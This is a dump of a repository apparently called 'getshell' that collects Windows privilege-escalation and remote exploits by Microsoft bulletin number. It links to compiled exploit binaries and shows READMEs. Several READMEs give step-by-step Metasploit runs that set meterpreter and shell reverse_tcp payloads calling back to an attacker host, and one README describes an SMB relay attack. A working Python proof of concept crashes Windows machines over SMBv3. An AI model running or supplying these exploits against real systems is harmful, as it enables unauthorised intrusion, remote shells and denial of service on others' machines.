├── CVE-2017-0213 ├── CVE-2017-0213-zcgonvh-master.zip ├── CVE-2017-0213.cpp ├── CVE-2017-0213_x64.zip ├── CVE-2017-0213_x86.zip ├── README.md └── win10.png ├── CVE-2017-8464 ├── README.md └── cve_2017_8464_lnk_rce.rb ├── CVE-2018-0833 ├── README.md ├── exploit.gif └── poc.py ├── LICENSE ├── MS03-026 ├── 66.c ├── MS03-026.exe ├── README.md └── ms03-026.c ├── MS05-039 ├── MS05-039.exe ├── PnP_Service.c └── README.md ├── MS06-040 ├── 2355.pm ├── README.md └── ms06040.rar ├── MS08-025 ├── MS08-025.exe ├── README.md ├── ms08025.rar └── source.zip ├── MS08-066 └── ms08066提权(XP 2003).zip ├── MS08-067 ├── 40279.py ├── MS08-067.exe ├── MS08-067_2K3.exe └── README.md ├── MS08-068 ├── Disable_Port_445.reg ├── Enable_Port_445.reg ├── README.md ├── libeay32.dll ├── smbrelay3.exe ├── smrs.exe └── src │ ├── httprelay.cpp │ ├── httprelay.h │ ├── imaprelay.cpp │ ├── imaprelay.h │ ├── misc.cpp │ ├── misc.h │ ├── ntlm.cpp │ ├── ntlm.h │ ├── payload.cpp │ ├── payload.h │ ├── pop3relay.cpp │ ├── pop3relay.h │ ├── smb.cpp │ ├── smb.h │ ├── smbrelay.h │ ├── smbrelay3.cpp │ ├── smtprelay.cpp │ └── smtprelay.h ├── MS09-012 ├── Chimichurri │ ├── .svn │ │ ├── all-wcprops │ │ ├── entries │ │ ├── prop-base │ │ │ ├── Chimichurri.ncb.svn-base │ │ │ └── Chimichurri.suo.svn-base │ │ └── text-base │ │ │ ├── Chimichurri.cpp.svn-base │ │ │ ├── Chimichurri.ncb.svn-base │ │ │ ├── Chimichurri.sln.svn-base │ │ │ ├── Chimichurri.suo.svn-base │ │ │ ├── Chimichurri.vcproj.svn-base │ │ │ ├── ReadMe.txt.svn-base │ │ │ ├── stdafx.cpp.svn-base │ │ │ └── stdafx.h.svn-base │ ├── Chimichurri.cpp │ ├── Chimichurri.ncb │ ├── Chimichurri.sln │ ├── Chimichurri.suo │ ├── Chimichurri.vcproj │ ├── Debug │ │ └── .svn │ │ │ ├── all-wcprops │ │ │ └── entries │ ├── ReadMe.txt │ ├── stdafx.cpp │ └── stdafx.h ├── Churraskito-source.zip ├── MS09-012KB952004-CVE-2009-0079-烤肉Churrasco.rar ├── README.md ├── churrasco.png ├── pr.exe └── pr.png ├── MS09-020 ├── MS09-020-KB970483-CVE-2009-1535-IIS6.zip ├── README.md └── iis6.0.png ├── MS09-050 ├── 40280.py ├── 41987.py └── README.md ├── MS10-012 ├── MS10-012.txt ├── MS10-020.py └── README.md ├── MS10-015 ├── CVE-2010-0232.txt ├── MS10-015.zip ├── MS10-015KB977165-CVE-2010-0232-Ms-Viru.rar ├── README.md ├── screenshot.png └── win2003.png ├── MS10-048 ├── 2003.png ├── README.md └── ms10048 │ ├── ms10048.exe │ └── ms10048X64.exe ├── MS10-059 ├── Churraskito_exe.zip ├── MS10-059.exe └── README.md ├── MS10-065 ├── MS10-065-KB2124261-KB2271195-CVE-2010-1899-IIS7.zip └── README.md ├── MS10-092 ├── CVE-2010-3338.wsf ├── Enviroment │ └── FoxitReader411_enu_Setup.exe ├── MS10-092.rb └── README.md ├── MS11-011 ├── 16262.c ├── MS11-011.exe └── README.md ├── MS11-046 ├── 2003.png ├── 2003_k8.png ├── CVE-2011-1249.c ├── MS11_46_k8.exe ├── README.md ├── ms11-046.exe └── win7.png ├── MS11-062 ├── 40627.exe ├── CVE-2011-1974.c ├── MS11-062.exe ├── README.md ├── service_st.png └── win2003.png ├── MS11-080 ├── 2003_k8.png ├── CVE-2011-2005.py ├── MS11_80_k8.exe ├── README.md ├── ms11-080-AddUser.exe ├── ms11-080.exe ├── win2003.png └── win7.jpg ├── MS12-020 ├── MS12-020.rb ├── MS12-020KB2621440-CVE-2012-0002.rar ├── MS12-020检测.zip ├── README.md ├── blue-death.png ├── ms12-020.exe ├── ms12-020_.exe ├── msf.png └── rdpclient.rar ├── MS12-042 ├── README.md ├── Sysret(MS12-042).zip ├── sysret-source │ ├── junk.suo │ ├── junk │ │ ├── MinHook │ │ │ ├── MinHook.h │ │ │ └── MinHook.x64.lib │ │ ├── ReadMe.txt │ │ ├── junk.vcxproj │ │ ├── junk.vcxproj.filters │ │ ├── junk.vcxproj.user │ │ ├── krnlutils.cpp │ │ ├── log.cpp │ │ ├── log.h │ │ ├── peutil.h │ │ ├── peutils.cpp │ │ ├── sources │ │ │ ├── CMakeLists.txt │ │ │ ├── beaengineSources │ │ │ │ ├── BeaEngine.c │ │ │ │ ├── BeaEngine.obj │ │ │ │ ├── CMakeLists.txt │ │ │ │ ├── COPYING.LESSER.txt │ │ │ │ ├── COPYING.txt │ │ │ │ ├── Includes │ │ │ │ │ ├── BeaEngineVersion.c │ │ │ │ │ ├── Routines_Disasm.c │ │ │ │ │ ├── Routines_ModRM.c │ │ │ │ │ ├── instr_set │ │ │ │ │ │ ├── Data_opcode.h │ │ │ │ │ │ ├── opcodes_AES.c │ │ │ │ │ │ ├── opcodes_A_M.c │ │ │ │ │ │ ├── opcodes_CLMUL.c │ │ │ │ │ │ ├── opcodes_FPU.c │ │ │ │ │ │ ├── opcodes_Grp1.c │ │ │ │ │ │ ├── opcodes_Grp12.c │ │ │ │ │ │ ├── opcodes_Grp13.c │ │ │ │ │ │ ├── opcodes_Grp14.c │ │ │ │ │ │ ├── opcodes_Grp15.c │ │ │ │ │ │ ├── opcodes_Grp16.c │ │ │ │ │ │ ├── opcodes_Grp2.c │ │ │ │ │ │ ├── opcodes_Grp3.c │ │ │ │ │ │ ├── opcodes_Grp4.c │ │ │ │ │ │ ├── opcodes_Grp5.c │ │ │ │ │ │ ├── opcodes_Grp6.c │ │ │ │ │ │ ├── opcodes_Grp7.c │ │ │ │ │ │ ├── opcodes_Grp8.c │ │ │ │ │ │ ├── opcodes_Grp9.c │ │ │ │ │ │ ├── opcodes_MMX.c │ │ │ │ │ │ ├── opcodes_N_Z.c │ │ │ │ │ │ ├── opcodes_SSE.c │ │ │ │ │ │ └── opcodes_prefixes.c │ │ │ │ │ ├── internal_datas.h │ │ │ │ │ └── protos.h │ │ │ │ └── README.txt │ │ │ └── include │ │ │ │ └── beaengine │ │ │ │ ├── BeaEngine.h │ │ │ │ ├── basic_types.h │ │ │ │ ├── export.h │ │ │ │ └── macros.h │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ ├── sysret.cpp │ │ ├── sysret.h │ │ ├── targetver.h │ │ └── trigger.asm │ ├── sysret.sln │ ├── sysret.suo │ └── x64 │ │ └── Release │ │ ├── MinHook.x64.dll │ │ └── sysret.exe └── win7.png ├── MS13-005 ├── README.md └── ms13-005-funz-poc.cpp ├── MS13-046 ├── 2003.png ├── MS13-046-KB2829361 │ ├── epathobj_exp32(MS13-046).exe │ └── epathobj_exp64(MS13-046).exe ├── README.md └── win7_local.png ├── MS13-053 ├── 2003.png ├── MS13-053-KB2850851.zip └── README.md ├── MS14-002 ├── CVE-2013-5065.c ├── CVE-2013-5065.exe ├── CVE-2013-5065.py ├── MS14-002.exe ├── README.md └── win2003.png ├── MS14-040 ├── CVE-2014-1767 │ ├── 39446.py │ ├── 39525.py │ ├── MS14-040.cpp │ └── MS14-40-x32.py ├── MS14-040-x64.exe ├── MS14-40-x86.exe └── README.md ├── MS14-058 ├── 2008.png ├── CVE-2014-4113-Exploit.rar ├── Exploit │ ├── .vs │ │ └── Exploit │ │ │ └── v14 │ │ │ └── .suo │ ├── Exploit.VC.db │ ├── Exploit.sln │ ├── Exploit.v12.suo │ ├── Exploit │ │ ├── Exploit.cpp │ │ ├── Exploit.vcxproj │ │ ├── Exploit.vcxproj.filters │ │ ├── ReadMe.txt │ │ ├── Release │ │ │ ├── Exploit.log │ │ │ ├── Exploit.obj │ │ │ ├── Exploit.pch │ │ │ ├── Exploit.tlog │ │ │ │ ├── CL.command.1.tlog │ │ │ │ ├── CL.read.1.tlog │ │ │ │ ├── CL.write.1.tlog │ │ │ │ ├── Exploit.lastbuildstate │ │ │ │ ├── link.command.1.tlog │ │ │ │ ├── link.read.1.tlog │ │ │ │ └── link.write.1.tlog │ │ │ ├── stdafx.obj │ │ │ └── vc140.pdb │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ └── targetver.h │ └── Release │ │ ├── Exploit.exe │ │ ├── Exploit.iobj │ │ ├── Exploit.ipdb │ │ └── Exploit.pdb ├── MS14-058.exe ├── README.md ├── Trigger │ ├── Trigger.opensdf │ ├── Trigger.sln │ ├── Trigger.v12.suo │ └── Trigger │ │ ├── ReadMe.txt │ │ ├── Trigger.cpp │ │ ├── Trigger.vcxproj │ │ ├── Trigger.vcxproj.filters │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ └── targetver.h └── win7.png ├── MS14-068 ├── MS14-068.exe ├── README.md ├── img │ ├── x1.png │ ├── x2.png │ ├── x3.png │ └── x4.png ├── mimikatz_trunk.zip └── pykek │ ├── README.md │ ├── kek │ ├── __init__.py │ ├── _crypto │ │ ├── ARC4.py │ │ ├── MD4.py │ │ ├── MD5.py │ │ └── __init__.py │ ├── ccache.py │ ├── crypto.py │ ├── krb5.py │ ├── pac.py │ └── util.py │ ├── ms14-068.py │ └── pyasn1 │ ├── __init__.py │ ├── codec │ ├── __init__.py │ ├── ber │ │ ├── __init__.py │ │ ├── decoder.py │ │ ├── encoder.py │ │ └── eoo.py │ ├── cer │ │ ├── __init__.py │ │ ├── decoder.py │ │ └── encoder.py │ └── der │ │ ├── __init__.py │ │ ├── decoder.py │ │ └── encoder.py │ ├── compat │ ├── __init__.py │ └── octets.py │ ├── debug.py │ ├── error.py │ └── type │ ├── __init__.py │ ├── base.py │ ├── char.py │ ├── constraint.py │ ├── error.py │ ├── namedtype.py │ ├── namedval.py │ ├── tag.py │ ├── tagmap.py │ ├── univ.py │ └── useful.py ├── MS14-070 ├── CVE-2014-4076.c ├── MS14-070.rar ├── MS14-070 │ ├── 35936.exe │ └── 37755.exe ├── README.md └── win2003.png ├── MS15-001 ├── AppCompatCache.exe ├── README.md ├── TestDLL.dll └── source.zip ├── MS15-010 ├── 37098.txt ├── 39035.exe ├── CVE-2015-0057.zip └── README.md ├── MS15-015 ├── README.md └── ms15-015.zip ├── MS15-051 ├── 2008.png ├── 37049-32.exe ├── Compiled │ ├── Taihou32.exe │ └── Taihou64.exe ├── MS15-051-KB3045171.zip ├── README.md ├── ms15-051.zip └── win7.png ├── MS15-061 ├── README.md └── ms15-061.cpp ├── MS15-076 ├── Binary │ ├── Microsoft.VisualStudio.OLE.Interop.dll │ └── Trebuchet.exe ├── README.md └── source.zip ├── MS15-077 ├── 2003.png ├── HTFontExp.rar ├── MS15-077-KB3077657.zip ├── README.md ├── elevator.exe ├── ex.cpp ├── exp │ ├── WindowsServer2003-KB3077657-x64-ENU.exe │ └── WindowsServer2003-KB3077657-x86-ENU.exe ├── win7-x64.png └── win7.jpg ├── MS15-097 ├── 38198 │ ├── Poc_NtUserGetClipboardAccessToken_SecurityBypass.exe │ └── injected.dll ├── MS15-097-KB3079904-CVE-2015-2527.zip ├── README.md └── exp │ ├── README.md │ └── _CVE_2015_2546_exp.cpp ├── MS16-014 └── ms16-014.rar ├── MS16-016 ├── 39788 │ ├── EoP.exe │ └── Shellcode.dll ├── BSoD.exe ├── EoP.zip ├── EoP_variant.zip ├── README.md ├── bsod_win10x64.gif └── eop_win7x86.gif ├── MS16-032 ├── MS16-032.ps1 ├── README.md ├── img │ ├── win10.png │ ├── x64.png │ └── x86.png ├── x64 │ └── ms16-032.exe └── x86 │ └── ms16-032.exe ├── MS16-034 ├── FillRgn_BSoD.cpp ├── MS16-034-exp.cpp └── README.md ├── MS16-075 ├── README.md ├── Tater.ps1 ├── img │ ├── IIS_shell.png │ ├── potato.png │ └── win10.png ├── ms16-075.rb └── potato.exe ├── MS16-098 ├── README.md ├── bfill.exe ├── gdi-palettes-exp.zip ├── main.c └── win8_1.png ├── MS16-111 ├── 40429.cs ├── 40429.exe ├── README.md ├── win10.png └── win8.1.png ├── MS16-135 ├── 40823 │ ├── SetWindowLongPtr_Exploit.exe │ └── SetWindowLongPtr_Exploit.pdb ├── 40823-source.zip ├── 41015.c ├── 41015.exe ├── MS16-135.ps1 ├── README.md ├── Win10.png ├── Win7.png ├── Win8.png └── Win81.png ├── MS17-010 ├── MS17-010-2012.zip ├── README.md └── ms17_010_eternalblue.rb ├── MS17-017 ├── MS17-017.cpp ├── MS17-017.exe ├── README.md ├── gdi-palettes-exp.zip └── ms17-017.jpg ├── README.md └── win-exp-suggester ├── 2017-06-14-mssb.xls ├── README.md ├── help.md └── windows-exploit-suggester.py /CVE-2017-0213/CVE-2017-0213-zcgonvh-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/CVE-2017-0213/CVE-2017-0213-zcgonvh-master.zip -------------------------------------------------------------------------------- /CVE-2017-0213/CVE-2017-0213.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/CVE-2017-0213/CVE-2017-0213.cpp -------------------------------------------------------------------------------- /CVE-2017-0213/CVE-2017-0213_x64.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/CVE-2017-0213/CVE-2017-0213_x64.zip -------------------------------------------------------------------------------- /CVE-2017-0213/CVE-2017-0213_x86.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/CVE-2017-0213/CVE-2017-0213_x86.zip -------------------------------------------------------------------------------- /CVE-2017-0213/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-0213 2 | 3 | Windows COM Elevation of Privilege Vulnerability 4 | 5 | **Description** 6 | ``` 7 | An elevation of privilege exists in Windows COM Aggregate Marshaler. 8 | An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges. 9 | To exploit the vulnerability, an attacker could run a specially crafted application that could exploit the vulnerability. 10 | This vulnerability by itself does not allow arbitrary code to be run. 11 | However, this vulnerability could be used in conjunction with one or more vulnerabilities (e.g. a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running. 12 | The update addresses the vulnerability by correcting how Windows COM Marshaler processes interface requests. 13 | ``` 14 | - The exp was from [@WindowsExploits](https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213/Source) 15 | 16 | Vulnerability reference: 17 | * [CVE-2017-0213](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0213) 18 | * [exp-db](https://www.exploit-db.com/exploits/42020/) 19 | 20 | 21 | ## Usage 22 | - [YouTube-CVE 2017-0213](https://www.youtube.com/watch?v=6naFH9MQHy8)   23 | ``` 24 | c:\> CVE-2017-0213_x64.exe 25 | ``` 26 | ![win10](win10.png) 27 | 28 | 29 | ## References 30 | - [Windows: COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP](https://bugs.chromium.org/p/project-zero/issues/detail?id=1107) 31 | - [Microsoft](https://portal.msrc.microsoft.com/en-US/eula) 32 | 33 | 34 | -------------------------------------------------------------------------------- /CVE-2017-0213/win10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/CVE-2017-0213/win10.png -------------------------------------------------------------------------------- /CVE-2017-8464/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-8464 2 | ``` 3 | Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, 4 | Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 5 | allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled 6 | during icon display in Windows Explorer or any other application that parses the icon of the shortcut. 7 | aka "LNK Remote Code Execution Vulnerability." 8 | ``` 9 | 10 | Vulnerability reference: 11 | * [CVE-2017-8464](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464) 12 | * [exp-db](https://www.exploit-db.com/exploits/42382/) 13 | 14 | 15 | ## load the module within the Metasploit 16 | [msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms10_092_schelevator) 17 | ``` 18 | msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce 19 | msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp 20 | msf exploit(cve_2017_8464_lnk_rce) > set lhost 21 | msf exploit(cve_2017_8464_lnk_rce) > set lport 8988 22 | msf exploit(cve_2017_8464_lnk_rce) > run 23 | msf exploit(ms10_092_schelevator) > exploit 24 | 25 | msf exploit(cve_2017_8464_lnk_rce) > use exploit/multi/handler 26 | msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp 27 | msf exploit(handler) > set lhost 28 | msf exploit(handler) > set lport 8988 29 | msf exploit(handler) > run 30 | ``` -------------------------------------------------------------------------------- /CVE-2018-0833/README.md: -------------------------------------------------------------------------------- 1 | # SMBv3 Null Pointer Dereference Denial of Service 2 | 3 | ## Description 4 | 5 | A server information block (SMB) is a network file sharing protocol that allows applications and end users to access file resources from a remote file server. The crash occurred in the module "mrxsmb". This is a redirector of a Microsoft server message block (SMB). Windows 8.1 and Windows server 2012 R2 the vulnerability in Windows 8.1 (x86) on execution, send a carefully constructed data package, because it wants to address from the 0x00000030 memory read a protected (empty page protection) value, the value in the protected memory space will cause the kernel the exception handling, forcing the machine restart cause denial of service. 6 | 7 | ## Usage 8 | ``` 9 | root@xxoo:/# python poc.py 10 | ``` 11 | 12 | ![exploit](https://raw.githubusercontent.com/iBearcat/CVE-2018-0833/master/exploit.gif) 13 | 14 | ## Vulnerability reference: 15 | 16 | * [smbv3 null pointer dereference vulnerability](https://krbtgt.pw/smbv3-null-pointer-dereference-vulnerability) 17 | * [CVE-2018-0833](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0833) 18 | * [exploit-db](https://www.exploit-db.com/exploits/44189/) 19 | * [cnvd](http://www.cnvd.org.cn/flaw/show/CNVD-2018-05738) 20 | -------------------------------------------------------------------------------- /CVE-2018-0833/exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/CVE-2018-0833/exploit.gif -------------------------------------------------------------------------------- /CVE-2018-0833/poc.py: -------------------------------------------------------------------------------- 1 | # Exploit Title: Microsoft Windows SMB Client Null Pointer Dereference Denial of Service 2 | # Date: 26/02/2018 3 | # Exploit Author: Nabeel Ahmed 4 | # Version: SMBv3 5 | # Tested on: Windows 8.1 (x86), Windows Server 2012 R2 (x64) 6 | # CVE : CVE-2018-0833 7 | 8 | import SocketServer 9 | from binascii import unhexlify 10 | payload = '000000ecfd534d4241414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141' 11 | class byebye(SocketServer.BaseRequestHandler): 12 | def handle(self): 13 | try: 14 | print "From:", self.client_address 15 | print "[*]Sending Payload..." 16 | self.request.send(unhexlify(payload)) 17 | except Exception: 18 | print "BSoD Triggered on", self.client_address 19 | pass 20 | SocketServer.TCPServer.allow_reuse_address = 1 21 | launch = SocketServer.TCPServer(('', 445),byebye) 22 | launch.serve_forever() -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 SecWiki 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /MS03-026/MS03-026.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS03-026/MS03-026.exe -------------------------------------------------------------------------------- /MS03-026/README.md: -------------------------------------------------------------------------------- 1 | # MS03-026 2 | 3 | MS03-026 4 | 5 | Vulnerability reference: 6 | * [MS03-026](https://technet.microsoft.com/library/security/ms03-026) 7 | 8 | ## msf Usage 9 | * [YouTube-ms03 026](https://www.youtube.com/watch?v=OZwQo8kqdBM) 10 | ``` 11 | msf > search ms03_026 12 | msf > use exploit/windows/dcerpc/ms03_026_dcom 13 | msf exploit(ms03_026_dcom) > set RHOST 192.168.229.129 14 | msf exploit(ms03_026_dcom) > set LHOST 192.168.229.35 15 | msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp 16 | msf exploit(ms03_026_dcom) > exploit 17 | 18 | meterpreter > execute -f cmd.exe -c -1 19 | ``` 20 | 21 | ## References 22 | [Microsoft Windows DCOM RPC接口长主机名远程缓冲区溢出漏洞](http://blog.chinaunix.net/uid-286494-id-2134482.html) -------------------------------------------------------------------------------- /MS05-039/MS05-039.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS05-039/MS05-039.exe -------------------------------------------------------------------------------- /MS05-039/README.md: -------------------------------------------------------------------------------- 1 | # MS05-039 2 | 3 | 4 | Vulnerability reference: 5 | * [MS05-039](https://technet.microsoft.com/library/security/ms05-039) 6 | * [CVE-2005-1983](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1983) 7 | 8 | 9 | ## References 10 | + [MS05039分析](http://www.2cto.com/article/201304/205544.html) 11 | + [初试MS05039远程溢出攻击](http://blog.csdn.net/shuilan0066/article/details/5920671) 12 | + [Ms-05039漏洞原理分析](http://www.ithao123.cn/content-1002576.html) 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /MS06-040/README.md: -------------------------------------------------------------------------------- 1 | # MS06-040 2 | 3 | MS06-040 4 | 5 | Vulnerability reference: 6 | * [MS06-040](https://technet.microsoft.com/library/security/ms06-040) 7 | * [CVE-2006-3439](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439) 8 | * [exp-db](https://www.exploit-db.com/exploits/2355/) 9 | 10 | ## msf Usage 11 | * [YouTube-ms06-040](https://www.youtube.com/watch?v=AsZ8qTr7IoE) 12 | ``` 13 | msf > search ms06_040 14 | msf > use exploit/windows/smb/ms06_040_netapi 15 | msf exploit(ms06_040_netapi) > show payloads 16 | msf exploit(ms06_040_netapi) > set payload windows/shell/reverse_tcp 17 | msf exploit(ms06_040_netapi) > set RHOST 192.1.80.2 18 | msf exploit(ms06_040_netapi) > set LHOST 192.1.80.152 19 | msf exploit(ms06_040_netapi) > set TARGET 0TARGET -> 0 20 | msf exploit(ms06_040_netapi) > exploit 21 | session -i 1 22 | 23 | Microsoft Windows 2000 [Version 5.00.2195] 24 | (C) 版权所有 1985-2000 Microsoft Corp. 25 | C:\WINNT\system32> 26 | ``` 27 | 28 | ## References 29 | * [深入浅出MS06-040](http://blog.csdn.net/iiprogram/article/details/2820149) 30 | * [How to Exploit MS06-040](https://www.linickx.com/how-to-exploit-ms06-040) 31 | 32 | 33 | -------------------------------------------------------------------------------- /MS06-040/ms06040.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS06-040/ms06040.rar -------------------------------------------------------------------------------- /MS08-025/MS08-025.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-025/MS08-025.exe -------------------------------------------------------------------------------- /MS08-025/README.md: -------------------------------------------------------------------------------- 1 | # MS08-025 2 | 3 | MS08-025 4 | 5 | Vulnerability reference: 6 | * [MS08-025](https://technet.microsoft.com/library/security/ms08-025) 7 | * [CVE-2008-1084](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1084) 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /MS08-025/ms08025.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-025/ms08025.rar -------------------------------------------------------------------------------- /MS08-025/source.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-025/source.zip -------------------------------------------------------------------------------- /MS08-066/ms08066提权(XP 2003).zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-066/ms08066提权(XP 2003).zip -------------------------------------------------------------------------------- /MS08-067/MS08-067.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-067/MS08-067.exe -------------------------------------------------------------------------------- /MS08-067/MS08-067_2K3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-067/MS08-067_2K3.exe -------------------------------------------------------------------------------- /MS08-067/README.md: -------------------------------------------------------------------------------- 1 | # MS08-067 2 | MS08-067 3 | 4 | Vulnerability reference: 5 | * [MS08-067](https://technet.microsoft.com/library/security/ms08-067) 6 | * [CVE-2008-4250](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-4250) 7 | 8 | ## Usage 9 | 10 | ``` 11 | msf > db_status 12 | msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.229.137 13 | msf > search ms08_067 14 | msf > use exploit/windows/smb/ms08_067_netapi 15 | msf exploit(ms08_067_netapi) > set RHOST 192.168.229.137 16 | msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp 17 | msf exploit(ms08_067_netapi) > exploit 18 | ``` 19 | 20 | ## References 21 | + [ms08-067漏洞 远程溢出入侵测试](http://blog.csdn.net/sysprogram/article/details/8016776) 22 | + [kali攻击漏洞MS08_067](http://jingyan.baidu.com/article/9f63fb918dcadfc8400f0e28.html) 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /MS08-068/Disable_Port_445.reg: -------------------------------------------------------------------------------- 1 | Windows Registry Editor Version 5.00 2 | 3 | [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] 4 | "TransportBindName"="" 5 | -------------------------------------------------------------------------------- /MS08-068/Enable_Port_445.reg: -------------------------------------------------------------------------------- 1 | Windows Registry Editor Version 5.00 2 | 3 | [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] 4 | "TransportBindName"="\\Device\\" 5 | -------------------------------------------------------------------------------- /MS08-068/README.md: -------------------------------------------------------------------------------- 1 | # MS08-068 2 | 3 | ``` 4 | This module will relay SMB authentication requests to another host, gaining access to an authenticated SMB session if successful. If the connecting user is an administrator and network logins are allowed to the target machine, this module will execute an arbitrary payload. 5 | To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. 6 | When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate. 7 | Unfortunately, this module is not able to clean up after itself. The service and payload file listed in the output will need to be manually removed after access has been gained. 8 | The service created by this tool uses a randomly chosen name and description, so the services list can become cluttered after repeated exploitation. 9 | The SMB authentication relay attack was first reported by Sir Dystic on March 31st, 2001 at @lanta.con in Atlanta, Georgia. On November 11th 2008 Microsoft released bulletin MS08-068. 10 | This bulletin includes a patch which prevents the relaying of challenge keys back to the host which issued them, preventing this exploit from working in the default configuration. 11 | It is still possible to set the SMBHOST parameter to a third-party host that the victim is authorized to access, but the "reflection" attack has been effectively broken. 12 | ``` 13 | 14 | - The exp is from [exp-db](https://www.exploit-db.com/exploits/20/) 15 | Vulnerability reference: 16 | * [MS08-068](https://technet.microsoft.com/zh-cn/zh/library/security/ms08-068) 17 | * [CVE-2008-4037](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4037) 18 | 19 | 20 | ## load the module within the Metasploit console 21 | ``` 22 | msf > use exploit/windows/smb/smb_relay 23 | msf exploit(smb_relay) > show targets 24 | ...targets... 25 | msf exploit(smb_relay) > set TARGET 26 | msf exploit(smb_relay) > show options 27 | ...show and set options... 28 | msf exploit(smb_relay) > exploit 29 | 30 | ``` 31 | 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /MS08-068/libeay32.dll: -------------------------------------------------------------------------------- 